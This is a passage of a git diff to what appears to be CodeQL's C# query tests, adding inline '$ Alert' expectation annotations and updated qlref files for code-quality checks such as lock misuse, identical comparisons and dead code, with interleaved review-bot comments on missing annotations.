@@ -1 +1,2 @@ -Bad Practices/PathCombine.ql \ No newline at end of file +query: Bad Practices/PathCombine.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Bad Practices/VirtualCallInConstructorOrDestructor/VirtualCallInConstructorOrDestructor.cs b/csharp/ql/test/query-tests/Bad Practices/VirtualCallInConstructorOrDestructor/VirtualCallInConstructorOrDestructor.cs index 767c4e484a14..85e8528e939e 100644 --- a/csharp/ql/test/query-tests/Bad Practices/VirtualCallInConstructorOrDestructor/VirtualCallInConstructorOrDestructor.cs +++ b/csharp/ql/test/query-tests/Bad Practices/VirtualCallInConstructorOrDestructor/VirtualCallInConstructorOrDestructor.cs @@ -42,7 +42,7 @@ class C : B C() { // Method call - f_virtual(); // BAD + f_virtual(); // BAD // $ Alert f_sealed(); // GOOD f_nonvirtual(); // GOOD f_interface(); // GOOD @@ -51,23 +51,23 @@ class C : B // Method access Action a; - a = f_virtual; // BAD + a = f_virtual; // BAD // $ Alert a = f_sealed; // GOOD a = f_nonvirtual; // GOOD a = f_interface; // GOOD // Property access - int i = p_virtual; // BAD + int i = p_virtual; // BAD // $ Alert i = p_sealed; // GOOD i = p_nonvirtual; // GOOD // Indexer access - i = this[0]; // BAD + i = this[0]; // BAD // $ Alert i = this[""]; // GOOD i = this[new object()]; // GOOD // Event access - e_virtual += f_nonvirtual; // BAD + e_virtual += f_nonvirtual; // BAD // $ Alert e_sealed += f_nonvirtual; // GOOD e_nonvirtual += f_nonvirtual; // GOOD } diff --git a/csharp/ql/test/query-tests/Bad Practices/VirtualCallInConstructorOrDestructor/VirtualCallInConstructorOrDestructor.qlref b/csharp/ql/test/query-tests/Bad Practices/VirtualCallInConstructorOrDestructor/VirtualCallInConstructorOrDestructor.qlref index 22b4b9fc49c7..b7e586c7dac9 100644 --- a/csharp/ql/test/query-tests/Bad Practices/VirtualCallInConstructorOrDestructor/VirtualCallInConstructorOrDestructor.qlref 
+++ b/csharp/ql/test/query-tests/Bad Practices/VirtualCallInConstructorOrDestructor/VirtualCallInConstructorOrDestructor.qlref @@ -1 +1,2 @@ -Bad Practices/VirtualCallInConstructorOrDestructor.ql \ No newline at end of file +query: Bad Practices/VirtualCallInConstructorOrDestructor.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/CSI/CompareIdenticalValues/CompareIdenticalValues.cs b/csharp/ql/test/query-tests/CSI/CompareIdenticalValues/CompareIdenticalValues.cs index 719aaa865761..07e4a7119921 100644 --- a/csharp/ql/test/query-tests/CSI/CompareIdenticalValues/CompareIdenticalValues.cs +++ b/csharp/ql/test/query-tests/CSI/CompareIdenticalValues/CompareIdenticalValues.cs @@ -11,8 +11,8 @@ class CompareIdenticalValues : Super { public void M() { - if (this.Foo == Foo) ; - if (base.Foo == Foo) ; + if (this.Foo == Foo) ; // $ Alert + if (base.Foo == Foo) ; // $ Alert if (Foo == new CompareIdenticalValues().Foo) ; var x = "Abc"; 
@@ -20,45 +20,45 @@ public void M() var temp = x == x; // BAD: but flagged by cs/constant-comparison double d = double.NaN; - if (d == d) ; // !double.IsNan(d) - if (d <= d) ; // !double.IsNan(d), but unlikely to be intentional - if (d >= d) ; // !double.IsNan(d), but unlikely to be intentional - if (d != d) ; // double.IsNan(d) - if (d > d) ; // always false - if (d < d) ; // always false + if (d == d) ; // !double.IsNan(d) // $ Alert + if (d <= d) ; // !double.IsNan(d), but unlikely to be intentional // $ Alert + if (d >= d) ; // !double.IsNan(d), but unlikely to be intentional // $ Alert + if (d != d) ; // double.IsNan(d) // $ Alert + if (d > d) ; // always false // $ Alert + if (d < d) ; // always false // $ Alert float f = float.NaN; - if (f == f) ; // !float.IsNan(f) - if (f <= f) ; // !float.IsNan(f), but unlikely to be intentional - if (f >= f) ; // !float.IsNan(f), but unlikely to be intentional - if (f != f) ; // float.IsNan(f) - if (f > f) ; // always false - if (f < f) ; // always false + if (f == f) ; // !float.IsNan(f) // $ Alert + if (f <= f) ; // !float.IsNan(f), but unlikely to be intentional // $ Alert + if (f >= f) ; // !float.IsNan(f), but unlikely to be intentional // $ Alert + if (f != f) ; // float.IsNan(f) // $ Alert + if (f > f) ; // always false // $ Alert + if (f < f) ; // always false // $ Alert int i = 0; if (i == i) ; // BAD: but flagged by cs/constant-condition if (i != i) ; // BAD: but flagged by cs/constant-condition CompareIdenticalValues c = null; - c.Prop.Equals(c.Prop); - Equals(c.Prop.Prop.Prop.Foo + 2, c.Prop.Prop.Prop.Foo + 2); + c.Prop.Equals(c.Prop); // $ Alert + Equals(c.Prop.Prop.Prop.Foo + 2, c.Prop.Prop.Prop.Foo + 2); // $ Alert Equals(c.Prop.Prop.Prop.Foo, c.Prop.Prop.Foo); if (base.Bar == Bar) ; - if (Bar == this.Bar) ; - Equals(this); + if (Bar == this.Bar) ; // $ Alert + Equals(this); // $ Alert if (1 + 1 == 2) ; // BAD: but flagged by cs/constant-condition if (1 + 1 == 3) ; if (0 == 1) ; var a = new int[0]; - if 
(a[0] == a[0]) ; + if (a[0] == a[0]) ; // $ Alert - if (this.Bar[0] == Bar[1 - 1]) ; + if (this.Bar[0] == Bar[1 - 1]) ; // $ Alert if (this.Bar[0] == Bar[1]) ; - if (this.Prop[Foo] == Prop[this.Foo]) ; + if (this.Prop[Foo] == Prop[this.Foo]) ; // $ Alert if (this.Prop[0] == Prop[1]) ; } @@ -73,17 +73,17 @@ public void IsBoxed(T x) where T : I public void IsBoxedWrong1(T x) where T : struct { - ReferenceEquals(x, x); + ReferenceEquals(x, x); // $ Alert } public void IsBoxedWrong2(T x) where T : class { - ReferenceEquals(x, x); + ReferenceEquals(x, x); // $ Alert } public void IsBoxedWrong3(T x) where T : Super { - ReferenceEquals(x, x); + ReferenceEquals(x, x); // $ Alert } public int this[int i] { get { return 0; } } diff --git a/csharp/ql/test/query-tests/CSI/CompareIdenticalValues/CompareIdenticalValues.qlref b/csharp/ql/test/query-tests/CSI/CompareIdenticalValues/CompareIdenticalValues.qlref index 9df8726c3122..cbe82efdbb0e 100644 --- a/csharp/ql/test/query-tests/CSI/CompareIdenticalValues/CompareIdenticalValues.qlref +++ b/csharp/ql/test/query-tests/CSI/CompareIdenticalValues/CompareIdenticalValues.qlref @@ -1 +1,2 @@ -CSI/CompareIdenticalValues.ql \ No newline at end of file +query: CSI/CompareIdenticalValues.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Concurrency/FutileSyncOnField/FutileSyncOnField.cs b/csharp/ql/test/query-tests/Concurrency/FutileSyncOnField/FutileSyncOnField.cs index b0fd29e17fa9..3bb2733dee0a 100644 --- a/csharp/ql/test/query-tests/Concurrency/FutileSyncOnField/FutileSyncOnField.cs +++ b/csharp/ql/test/query-tests/Concurrency/FutileSyncOnField/FutileSyncOnField.cs @@ -10,12 +10,12 @@ void f(Object o2) void test() { - lock (o) + lock (o) // $ Alert { o = new Foo(); // BAD } - lock (o) + lock (o) // $ Alert { f(o = null); // BAD } @@ -25,7 +25,7 @@ void test() o = new Foo(); // GOOD } - lock (o2) + lock (o2) // $ Alert { GetNewObject(out o2); // BAD } 
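Review bot: In the `@@ -20,45 +20,45 @@ public void M()` hunk, several comparisons stay without `// $ Alert` and without any marker saying that this is intended, for example `if (base.Bar == Bar) ;`, `Equals(c.Prop.Prop.Prop.Foo, c.Prop.Prop.Foo);` and `if (this.Bar[0] == Bar[1]) ;`. With inline expectations an unannotated line is an implicit "no alert" assertion, and `base.Bar == Bar` sits right next to `if (base.Foo == Foo) ; // $ Alert` from the previous hunk, so a reader cannot tell a deliberate negative case from a missed annotation. I would add a short trailing comment to each negative case, e.g. `if (base.Bar == Bar) ; // GOOD: <reason>`, with the reason filled in by the author (the declarations of `Foo` and `Bar` are outside these hunks, so the reason cannot be confirmed from here). The body of `M` and the enclosing class continue outside the hunk.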
diff --git a/csharp/ql/test/query-tests/Concurrency/FutileSyncOnField/FutileSyncOnField.qlref b/csharp/ql/test/query-tests/Concurrency/FutileSyncOnField/FutileSyncOnField.qlref index f3967efa87b8..74b0da761fbf 100644 --- a/csharp/ql/test/query-tests/Concurrency/FutileSyncOnField/FutileSyncOnField.qlref +++ b/csharp/ql/test/query-tests/Concurrency/FutileSyncOnField/FutileSyncOnField.qlref @@ -1 +1,2 @@ -Concurrency/FutileSyncOnField.ql \ No newline at end of file +query: Concurrency/FutileSyncOnField.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Concurrency/LockOrder/LockOrder.cs b/csharp/ql/test/query-tests/Concurrency/LockOrder/LockOrder.cs index d2634c3e793b..69f1b89c657e 100644 --- a/csharp/ql/test/query-tests/Concurrency/LockOrder/LockOrder.cs +++ b/csharp/ql/test/query-tests/Concurrency/LockOrder/LockOrder.cs @@ -3,7 +3,7 @@ class LocalTest { // BAD: b is flagged. - Object a, b, c; + Object a, b, c; // $ Alert void F() { @@ -24,7 +24,7 @@ void H() class GlobalTest { // BAD: b is flagged. - static Object a, b, c; + static Object a, b, c; // $ Alert void F() { @@ -51,7 +51,7 @@ void I() class LambdaTest { // BAD: a is flagged. - static Object a, b; + static Object a, b; // $ Alert void F() { diff --git a/csharp/ql/test/query-tests/Concurrency/LockOrder/LockOrder.qlref b/csharp/ql/test/query-tests/Concurrency/LockOrder/LockOrder.qlref index ee922bdeb80a..7404f9bf0183 100644 --- a/csharp/ql/test/query-tests/Concurrency/LockOrder/LockOrder.qlref +++ b/csharp/ql/test/query-tests/Concurrency/LockOrder/LockOrder.qlref @@ -1 +1,2 @@ -Concurrency/LockOrder.ql \ No newline at end of file +query: Concurrency/LockOrder.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Concurrency/LockOrder/LockOrderBad.cs b/csharp/ql/test/query-tests/Concurrency/LockOrder/LockOrderBad.cs index a9dd05ac8663..f2c3b18f1b44 100644 
--- a/csharp/ql/test/query-tests/Concurrency/LockOrder/LockOrderBad.cs +++ b/csharp/ql/test/query-tests/Concurrency/LockOrder/LockOrderBad.cs @@ -3,7 +3,7 @@ class Deadlock { - private readonly Object lock1 = new Object(); + private readonly Object lock1 = new Object(); // $ Alert private readonly Object lock2 = new Object(); public void thread1() diff --git a/csharp/ql/test/query-tests/Concurrency/LockThis/LockThis.cs b/csharp/ql/test/query-tests/Concurrency/LockThis/LockThis.cs index f1bc631ced95..cb1057c519b9 100644 --- a/csharp/ql/test/query-tests/Concurrency/LockThis/LockThis.cs +++ b/csharp/ql/test/query-tests/Concurrency/LockThis/LockThis.cs @@ -6,7 +6,7 @@ class Program void f() { - lock (this) // Not OK + lock (this) // Not OK // $ Alert { } diff --git a/csharp/ql/test/query-tests/Concurrency/LockThis/LockThis.qlref b/csharp/ql/test/query-tests/Concurrency/LockThis/LockThis.qlref index 1cdf31326db7..7eb86f638bd3 100644 --- a/csharp/ql/test/query-tests/Concurrency/LockThis/LockThis.qlref +++ b/csharp/ql/test/query-tests/Concurrency/LockThis/LockThis.qlref @@ -1 +1,2 @@ -Concurrency/LockThis.ql \ No newline at end of file +query: Concurrency/LockThis.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Concurrency/LockedWait/LockedWait.cs b/csharp/ql/test/query-tests/Concurrency/LockedWait/LockedWait.cs index 8fbee2d035af..61b2b56219ab 100644 --- a/csharp/ql/test/query-tests/Concurrency/LockedWait/LockedWait.cs +++ b/csharp/ql/test/query-tests/Concurrency/LockedWait/LockedWait.cs @@ -22,14 +22,14 @@ static void Main() lock (lock1) { - System.Threading.Monitor.Wait(lock2); // BAD + System.Threading.Monitor.Wait(lock2); // BAD // $ Alert } lock (lock1) { lock (lock2) { - System.Threading.Monitor.Wait(lock2); // BAD + System.Threading.Monitor.Wait(lock2); // BAD // $ Alert } } 
@@ -37,7 +37,7 @@ static void Main() { lock (lock2) { - System.Threading.Monitor.Wait(lock1); // BAD + System.Threading.Monitor.Wait(lock1); // BAD // $ Alert } } } @@ -45,13 +45,13 @@ static void Main() [MethodImpl(MethodImplOptions.Synchronized)] void Lock2() { - System.Threading.Monitor.Wait(lock1); // BAD + System.Threading.Monitor.Wait(lock1); // BAD // $ Alert System.Threading.Monitor.Wait(this); // GOOD - System.Threading.Monitor.Wait(typeof(Program)); // BAD - System.Threading.Monitor.Wait(typeof(Int32)); // BAD + System.Threading.Monitor.Wait(typeof(Program)); // BAD // $ Alert + System.Threading.Monitor.Wait(typeof(Int32)); // BAD // $ Alert lock (lock1) { - System.Threading.Monitor.Wait(lock1); // BAD + System.Threading.Monitor.Wait(lock1); // BAD // $ Alert } } @@ -60,28 +60,28 @@ static void Lock3() { lock (lock1) { - System.Threading.Monitor.Wait(lock1); // BAD + System.Threading.Monitor.Wait(lock1); // BAD // $ Alert } - System.Threading.Monitor.Wait(lock1); // BAD + System.Threading.Monitor.Wait(lock1); // BAD // $ Alert System.Threading.Monitor.Wait(typeof(Program)); // GOOD - System.Threading.Monitor.Wait(typeof(Int32)); // BAD + System.Threading.Monitor.Wait(typeof(Int32)); // BAD // $ Alert } void Lock4() { lock (this) { - System.Threading.Monitor.Wait(typeof(Program)); // BAD + System.Threading.Monitor.Wait(typeof(Program)); // BAD // $ Alert System.Threading.Monitor.Wait(this); // GOOD - System.Threading.Monitor.Wait(lock1); // BAD + System.Threading.Monitor.Wait(lock1); // BAD // $ Alert } lock (typeof(Program)) { System.Threading.Monitor.Wait(typeof(Program)); // GOOD - System.Threading.Monitor.Wait(this); // BAD - System.Threading.Monitor.Wait(lock1); // BAD - System.Threading.Monitor.Wait(typeof(Int32)); // BAD + System.Threading.Monitor.Wait(this); // BAD // $ Alert + System.Threading.Monitor.Wait(lock1); // BAD // $ Alert + System.Threading.Monitor.Wait(typeof(Int32)); // BAD // $ Alert } } } 
diff --git a/csharp/ql/test/query-tests/Concurrency/LockedWait/LockedWait.qlref b/csharp/ql/test/query-tests/Concurrency/LockedWait/LockedWait.qlref index 559d900bb6cd..64c4021f0d81 100644 --- a/csharp/ql/test/query-tests/Concurrency/LockedWait/LockedWait.qlref +++ b/csharp/ql/test/query-tests/Concurrency/LockedWait/LockedWait.qlref @@ -1 +1,2 @@ -Concurrency/LockedWait.ql \ No newline at end of file +query: Concurrency/LockedWait.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Concurrency/SynchSetUnsynchGet/SynchSetUnsynchGet.cs b/csharp/ql/test/query-tests/Concurrency/SynchSetUnsynchGet/SynchSetUnsynchGet.cs index 8b41604a9e67..288783fabae0 100644 --- a/csharp/ql/test/query-tests/Concurrency/SynchSetUnsynchGet/SynchSetUnsynchGet.cs +++ b/csharp/ql/test/query-tests/Concurrency/SynchSetUnsynchGet/SynchSetUnsynchGet.cs @@ -6,7 +6,7 @@ class C1 object mutex = new Object(); // BAD: getter is unlocked - int BadProperty1 + int BadProperty1 // $ Alert { get { @@ -20,7 +20,7 @@ int BadProperty1 } // BAD: getter is not properly locked - int BadProperty2 + int BadProperty2 // $ Alert { get { diff --git a/csharp/ql/test/query-tests/Concurrency/SynchSetUnsynchGet/SynchSetUnsynchGet.qlref b/csharp/ql/test/query-tests/Concurrency/SynchSetUnsynchGet/SynchSetUnsynchGet.qlref index e1b6f28159c6..4604a0daa6c2 100644 --- a/csharp/ql/test/query-tests/Concurrency/SynchSetUnsynchGet/SynchSetUnsynchGet.qlref +++ b/csharp/ql/test/query-tests/Concurrency/SynchSetUnsynchGet/SynchSetUnsynchGet.qlref @@ -1 +1,2 @@ -Concurrency/SynchSetUnsynchGet.ql \ No newline at end of file +query: Concurrency/SynchSetUnsynchGet.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Concurrency/UnsafeLazyInitialization/UnsafeLazyInitialization.cs b/csharp/ql/test/query-tests/Concurrency/UnsafeLazyInitialization/UnsafeLazyInitialization.cs index cd83b18e65c4..6a292c83ae5b 100644 
--- a/csharp/ql/test/query-tests/Concurrency/UnsafeLazyInitialization/UnsafeLazyInitialization.cs +++ b/csharp/ql/test/query-tests/Concurrency/UnsafeLazyInitialization/UnsafeLazyInitialization.cs @@ -23,13 +23,13 @@ void Fn() obj1 = null; } } - } + } // $ Alert // BAD if (obj1 == null) lock (mutex) if (obj1 == null) - obj1 = null; + obj1 = null; // $ Alert // GOOD: A value-type if (cond1) @@ -84,7 +84,7 @@ void Fn() if (null == obj1) obj1 = null; } - } + } // $ Alert // GOOD: not a field object a = null; @@ -103,7 +103,7 @@ void Fn() obj1 = null; } } - } + } // $ Alert // BAD: both obj1 and obj3 are flagged. if (obj1 == null && obj3 == null) @@ -116,7 +116,7 @@ void Fn() obj3 = null; } } - } + } // $ Alert // GOOD: Locking a struct if (struct1 == struct2) @@ -134,7 +134,7 @@ void Fn() if (struct1.x is null) lock (mutex) if(struct1.x is null) - struct1.x = 3; + struct1.x = 3; // $ Alert // GOOD: Tuples are structs so cannot be volatile. if(pair1 == (1,2)) diff --git a/csharp/ql/test/query-tests/Concurrency/UnsafeLazyInitialization/UnsafeLazyInitialization.qlref b/csharp/ql/test/query-tests/Concurrency/UnsafeLazyInitialization/UnsafeLazyInitialization.qlref index 084b5abcc176..a78173ad9fb8 100644 --- a/csharp/ql/test/query-tests/Concurrency/UnsafeLazyInitialization/UnsafeLazyInitialization.qlref +++ b/csharp/ql/test/query-tests/Concurrency/UnsafeLazyInitialization/UnsafeLazyInitialization.qlref @@ -1 +1,2 @@ -Concurrency/UnsafeLazyInitialization.ql \ No newline at end of file +query: Concurrency/UnsafeLazyInitialization.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Concurrency/UnsynchronizedStaticAccess/UnsynchronizedStaticAccess.cs b/csharp/ql/test/query-tests/Concurrency/UnsynchronizedStaticAccess/UnsynchronizedStaticAccess.cs index c78ca515b518..eef9339a23fe 100644 --- a/csharp/ql/test/query-tests/Concurrency/UnsynchronizedStaticAccess/UnsynchronizedStaticAccess.cs 
+++ b/csharp/ql/test/query-tests/Concurrency/UnsynchronizedStaticAccess/UnsynchronizedStaticAccess.cs @@ -20,7 +20,7 @@ public static void aWriter() public void test() { // BAD: unsynchronized access - string val = dict["foo"]; + string val = dict["foo"]; // $ Alert lock (mutex) { @@ -66,6 +66,6 @@ private void testLocked() private void testMethod() { // BAD: called concurrently by thread - string val = dict["foo"]; + string val = dict["foo"]; // $ Alert } } diff --git a/csharp/ql/test/query-tests/Concurrency/UnsynchronizedStaticAccess/UnsynchronizedStaticAccess.qlref b/csharp/ql/test/query-tests/Concurrency/UnsynchronizedStaticAccess/UnsynchronizedStaticAccess.qlref index 59d6716994fd..2fceef745285 100644 --- a/csharp/ql/test/query-tests/Concurrency/UnsynchronizedStaticAccess/UnsynchronizedStaticAccess.qlref +++ b/csharp/ql/test/query-tests/Concurrency/UnsynchronizedStaticAccess/UnsynchronizedStaticAccess.qlref @@ -1 +1,2 @@ -Concurrency/UnsynchronizedStaticAccess.ql \ No newline at end of file +query: Concurrency/UnsynchronizedStaticAccess.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Configuration/PasswordInConfigurationFile/EmptyPasswordInConfigurationFile.qlref b/csharp/ql/test/query-tests/Configuration/PasswordInConfigurationFile/EmptyPasswordInConfigurationFile.qlref index 9dae41964f3f..94937ccf811b 100644 --- a/csharp/ql/test/query-tests/Configuration/PasswordInConfigurationFile/EmptyPasswordInConfigurationFile.qlref +++ b/csharp/ql/test/query-tests/Configuration/PasswordInConfigurationFile/EmptyPasswordInConfigurationFile.qlref @@ -1 +1 @@ -Configuration/EmptyPasswordInConfigurationFile.ql +query: Configuration/EmptyPasswordInConfigurationFile.ql diff --git a/csharp/ql/test/query-tests/Configuration/PasswordInConfigurationFile/PasswordInConfigurationFile.qlref b/csharp/ql/test/query-tests/Configuration/PasswordInConfigurationFile/PasswordInConfigurationFile.qlref index b440a1f6909b..0479b5098f3d 100644 
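Review bot: `EmptyPasswordInConfigurationFile.qlref` here and `PasswordInConfigurationFile.qlref` in the next hunk are rewritten to the `query:` form but, unlike the other qlrefs converted in this patch, get no `postprocess: utils/test/InlineExpectationsTestQuery.ql` line. The inputs for these two tests are not part of the diff; if they are configuration files that cannot carry `$ Alert` comments, that reason should be stated in the commit description so the omission does not look like an oversight. Otherwise the two credential-in-configuration queries remain checked only against their `.expected` files, and adding `postprocess: utils/test/InlineExpectationsTestQuery.ql` plus annotations on the inputs would bring them in line with the rest of the change.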
--- a/csharp/ql/test/query-tests/Configuration/PasswordInConfigurationFile/PasswordInConfigurationFile.qlref +++ b/csharp/ql/test/query-tests/Configuration/PasswordInConfigurationFile/PasswordInConfigurationFile.qlref @@ -1 +1 @@ -Configuration/PasswordInConfigurationFile.ql +query: Configuration/PasswordInConfigurationFile.ql diff --git a/csharp/ql/test/query-tests/Dead Code/NonAssignedFields/NonAssignedFields.cs b/csharp/ql/test/query-tests/Dead Code/NonAssignedFields/NonAssignedFields.cs index f7f18a187da2..00f79bc89d74 100644 --- a/csharp/ql/test/query-tests/Dead Code/NonAssignedFields/NonAssignedFields.cs +++ b/csharp/ql/test/query-tests/Dead Code/NonAssignedFields/NonAssignedFields.cs @@ -84,8 +84,8 @@ struct PtrToStructure2 class Fields1 { // BAD: - int BadNonAssigned; - object BadAssignedNull = null; + int BadNonAssigned; // $ Alert + object BadAssignedNull = null; // $ Alert // GOOD: int GoodAssignedByInitializer = 0; diff --git a/csharp/ql/test/query-tests/Dead Code/NonAssignedFields/NonAssignedFields.qlref b/csharp/ql/test/query-tests/Dead Code/NonAssignedFields/NonAssignedFields.qlref index 39148492539f..c2632de3dd2e 100644 --- a/csharp/ql/test/query-tests/Dead Code/NonAssignedFields/NonAssignedFields.qlref +++ b/csharp/ql/test/query-tests/Dead Code/NonAssignedFields/NonAssignedFields.qlref @@ -1 +1,2 @@ -Dead Code/NonAssignedFields.ql \ No newline at end of file +query: Dead Code/NonAssignedFields.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Dead Code/Tests/DeadRefTypes.qlref b/csharp/ql/test/query-tests/Dead Code/Tests/DeadRefTypes.qlref index 56db2195eb87..e8ba93a5e7fc 100644 --- a/csharp/ql/test/query-tests/Dead Code/Tests/DeadRefTypes.qlref +++ b/csharp/ql/test/query-tests/Dead Code/Tests/DeadRefTypes.qlref @@ -1 +1,2 @@ -Dead Code/DeadRefTypes.ql \ No newline at end of file +query: Dead Code/DeadRefTypes.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/csharp/ql/test/query-tests/Dead Code/Tests/UnusedField.qlref b/csharp/ql/test/query-tests/Dead Code/Tests/UnusedField.qlref index 8464f79cd9bc..3803f9ec7bad 100644 --- a/csharp/ql/test/query-tests/Dead Code/Tests/UnusedField.qlref +++ b/csharp/ql/test/query-tests/Dead Code/Tests/UnusedField.qlref @@ -1 +1,2 @@ -Dead Code/UnusedField.ql +query: Dead Code/UnusedField.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Dead Code/Tests/UnusedMethod.qlref b/csharp/ql/test/query-tests/Dead Code/Tests/UnusedMethod.qlref index efc3937de8c0..9edba82f5dbf 100644 --- a/csharp/ql/test/query-tests/Dead Code/Tests/UnusedMethod.qlref +++ b/csharp/ql/test/query-tests/Dead Code/Tests/UnusedMethod.qlref @@ -1 +1,2 @@ -Dead Code/UnusedMethod.ql +query: Dead Code/UnusedMethod.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Dead Code/Tests/deadcode.cs b/csharp/ql/test/query-tests/Dead Code/Tests/deadcode.cs index d6905a6100fd..486e811ee02c 100644 --- a/csharp/ql/test/query-tests/Dead Code/Tests/deadcode.cs +++ b/csharp/ql/test/query-tests/Dead Code/Tests/deadcode.cs @@ -21,7 +21,7 @@ sealed class Exported : Interface1 } // BAD: Class is dead -sealed class Dead2 +sealed class Dead2 // $ Alert[cs/unused-reftype] { } @@ -82,7 +82,7 @@ static int Main(string[] args) public struct S { - C Field; // dead + C Field; // dead // $ Alert[cs/unused-field] class C { } // not dead } diff --git a/csharp/ql/test/query-tests/Dead Code/Tests/regression.cs b/csharp/ql/test/query-tests/Dead Code/Tests/regression.cs index 3f6a4a2937b4..bc4a3d6ce893 100644 --- a/csharp/ql/test/query-tests/Dead Code/Tests/regression.cs +++ b/csharp/ql/test/query-tests/Dead Code/Tests/regression.cs 
@@ -4,7 +4,7 @@ class Test : IComparer { // this is really dead - private string dead = "Actual dead field"; + private string dead = "Actual dead field"; // $ Alert[cs/unused-field] private static void Main(string[] args) { @@ -48,7 +48,7 @@ private static int PartCompare(string a, string b) } // this is really dead - private void ActualDeadMethod() { } + private void ActualDeadMethod() { } // $ Alert[cs/unused-method] // this is live private void DynamicSig(dynamic d) { } @@ -57,7 +57,7 @@ private void DynamicSig(dynamic d) { } private void DynamicallyCalled(int i) { } // this is dead - private void NotDynamicallyCalled(int i) { } + private void NotDynamicallyCalled(int i) { } // $ Alert[cs/unused-method] // this is live private void DynamicallyCalledOnDynamicType(int i) { } @@ -74,14 +74,14 @@ public static int GenericTest() static int liveFieldAccessedFromGeneric; // BAD: This is dead - void DeadCaller() + void DeadCaller() // $ Alert[cs/unused-method] { DeadGeneric(0); DeadGeneric(0.0); } // BAD: This is dead (called from dead) - void DeadGeneric(V a) { } + void DeadGeneric(V a) { } // $ Alert[cs/unused-method] } class GenericClass @@ -102,18 +102,18 @@ int LiveGeneric(V v) int liveField; // BAD: These are not live - void DeadGeneric1() + void DeadGeneric1() // $ Alert[cs/unused-method] { DeadGeneric2(0); DeadGeneric2(1.0); } - void DeadGeneric2(V v) { } + void DeadGeneric2(V v) { } // $ Alert[cs/unused-method] // BAD: This is dead (never accessed) - int deadField; + int deadField; // $ Alert[cs/unused-field] // BAD: This is dead (only ever written) - int deadWrittenField; + int deadWrittenField; // $ Alert[cs/unused-field] } class MemberInitialization @@ -126,7 +126,7 @@ class ThisIsLive : ITest { } public class FieldOutParam { // BAD: Only written (by an out param) - int deadField; + int deadField; // $ Alert[cs/unused-field] public void Test() { 
diff --git a/csharp/ql/test/query-tests/Documentation/XmldocExtraParam.qlref b/csharp/ql/test/query-tests/Documentation/XmldocExtraParam.qlref index fd8371466b6f..8439ce413ec1 100644 --- a/csharp/ql/test/query-tests/Documentation/XmldocExtraParam.qlref +++ b/csharp/ql/test/query-tests/Documentation/XmldocExtraParam.qlref @@ -1 +1,2 @@ -Documentation/XmldocExtraParam.ql +query: Documentation/XmldocExtraParam.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Documentation/XmldocExtraTypeParam.qlref b/csharp/ql/test/query-tests/Documentation/XmldocExtraTypeParam.qlref index bc8515e6675c..67de8cb4600e 100644 --- a/csharp/ql/test/query-tests/Documentation/XmldocExtraTypeParam.qlref +++ b/csharp/ql/test/query-tests/Documentation/XmldocExtraTypeParam.qlref @@ -1 +1,2 @@ -Documentation/XmldocExtraTypeParam.ql \ No newline at end of file +query: Documentation/XmldocExtraTypeParam.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Documentation/XmldocMissing.qlref b/csharp/ql/test/query-tests/Documentation/XmldocMissing.qlref index 281a5cb07029..6ca5136a2e38 100644 --- a/csharp/ql/test/query-tests/Documentation/XmldocMissing.qlref +++ b/csharp/ql/test/query-tests/Documentation/XmldocMissing.qlref @@ -1 +1,2 @@ -Documentation/XmldocMissing.ql \ No newline at end of file +query: Documentation/XmldocMissing.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Documentation/XmldocMissingException.qlref b/csharp/ql/test/query-tests/Documentation/XmldocMissingException.qlref index ec059908e38c..4cd247832588 100644 --- a/csharp/ql/test/query-tests/Documentation/XmldocMissingException.qlref +++ b/csharp/ql/test/query-tests/Documentation/XmldocMissingException.qlref @@ -1 +1,2 @@ -Documentation/XmldocMissingException.ql +query: Documentation/XmldocMissingException.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/csharp/ql/test/query-tests/Documentation/XmldocMissingParam.qlref b/csharp/ql/test/query-tests/Documentation/XmldocMissingParam.qlref index 9a8d6f801b7b..9b34d284c01d 100644 --- a/csharp/ql/test/query-tests/Documentation/XmldocMissingParam.qlref +++ b/csharp/ql/test/query-tests/Documentation/XmldocMissingParam.qlref @@ -1 +1,2 @@ -Documentation/XmldocMissingParam.ql +query: Documentation/XmldocMissingParam.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Documentation/XmldocMissingReturn.qlref b/csharp/ql/test/query-tests/Documentation/XmldocMissingReturn.qlref index 6eb8865b4b5d..ad0ea9697424 100644 --- a/csharp/ql/test/query-tests/Documentation/XmldocMissingReturn.qlref +++ b/csharp/ql/test/query-tests/Documentation/XmldocMissingReturn.qlref @@ -1 +1,2 @@ -Documentation/XmldocMissingReturn.ql +query: Documentation/XmldocMissingReturn.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Documentation/XmldocMissingSummary.qlref b/csharp/ql/test/query-tests/Documentation/XmldocMissingSummary.qlref index 5046e31a3db4..b90b6e39ce7f 100644 --- a/csharp/ql/test/query-tests/Documentation/XmldocMissingSummary.qlref +++ b/csharp/ql/test/query-tests/Documentation/XmldocMissingSummary.qlref @@ -1 +1,2 @@ -Documentation/XmldocMissingSummary.ql +query: 